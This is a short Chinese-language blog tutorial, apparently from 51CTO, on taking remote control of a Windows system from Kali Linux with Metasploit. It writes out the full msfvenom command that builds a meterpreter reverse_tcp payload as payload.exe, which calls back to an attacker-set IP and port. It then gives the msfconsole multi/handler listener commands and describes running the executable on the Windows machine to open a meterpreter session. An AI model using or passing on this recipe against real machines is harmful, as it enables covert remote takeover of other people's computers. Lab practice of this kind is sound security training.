Kali远程控制Windows系统(Metasploit)
原创
©著作权归作者所有:来自51CTO博客作者董哥的黑板报的原创作品,请联系作者获取转载授权,否则将追究法律责任
一、在Kali Linux中生成被控端
-
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:
- -p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”
- lhost:设置kali的IP
- lport:设置端口(要与下面的set lport保持一致)
- -f:文件的类型为exe类型
- -o:生成payload,名为payload.exe,保存在kali的/root目录下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/payload.exe
-
第二步:然后把上面在kali中生成的payload.exe移动到Windows系统中
二、在Kali Linux中启动主控端
-
第一步:在kali中输入msfconsole命令启动Metasploit工具
msfconsole
-
第二步:输入下面的命令,在Metasploit中使用handler作为主动端,这个handler位于exploit下的multi目录下
use exploit/multi/handler
-
第三步:设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)
set payload windows/meterpreter/reverse_tcp
-
第四步:设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致
-
最后一步:执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处
exploit
三、执行远程控制软件
- 上面生成了远程控制的被控端与主控端之后,现在来执行被控端的软件,执行之后,被控端就与主控端连接了
-
第二步:执行之后,可以看到kali主控端连接上了被控端。并且开启了meterpreter会话
-
第三步:现在主控端可以输入命令来操作被控端(注意,虽然被控端是windows平台,但是使用的命令是主控端系统所使用的命令)